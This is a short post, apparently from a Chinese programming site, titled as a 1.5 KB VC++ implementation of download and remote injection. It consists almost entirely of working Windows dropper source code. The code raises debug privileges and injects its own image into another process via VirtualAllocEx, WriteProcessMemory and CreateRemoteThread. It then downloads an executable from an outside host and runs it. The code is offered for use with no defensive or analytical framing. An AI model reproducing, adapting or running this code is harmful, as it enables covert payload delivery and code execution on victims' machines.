VC++1.5K字节实现下载并远程注入

 

 

 

#pragma comment(linker,"/BASE:0x13140000 /ENTRY:InjectPro /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text /SECTION:.text,EWR /IGNORE:4078")    #pragma comment(lib, "urlmon.lib")    #include <windows.h>       void InjectMemo()      {       URLDownloadToFile(0, "http://www.fi7ke.com/upiea.exe", TEXT("C:/upiea.exe"), 0, 0);       WinExec("c:/upiea.exe", SW_SHOW);       ExitThread(0);   }      void GetDebugPrivs()   {       HANDLE hToken;       DWORD ReGvl;       TOKEN_PRIVILEGES Ttges;          if (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))       {           LookupPrivilegeValue(NULL, "SeDebugPrivilege", &Ttges.Privileges[0].Luid);           Ttges.PrivilegeCount=1;           Ttges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;           AdjustTokenPrivileges(hToken, FALSE, &Ttges, 0,(PTOKEN_PRIVILEGES)NULL, &ReGvl);       }   }      void InjectPro()   {       DWORD Size,PID;       PBYTE module;       module = (PBYTE)GetModuleHandle(0);       Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;       HANDLE ProcessHandle;       LPVOID heart;       GetDebugPrivs();       GetWindowThreadProcessId(FindWindow("#32770", NULL), &PID);       ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);       VirtualFreeEx(ProcessHandle, module, 0, MEM_RELEASE);       heart = VirtualAllocEx(ProcessHandle, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);       WriteProcessMemory(ProcessHandle, heart, module, Size, NULL);       CreateRemoteThread(ProcessHandle, 0, 0, (LPTHREAD_START_ROUTINE)InjectMemo, module, 0, NULL);   }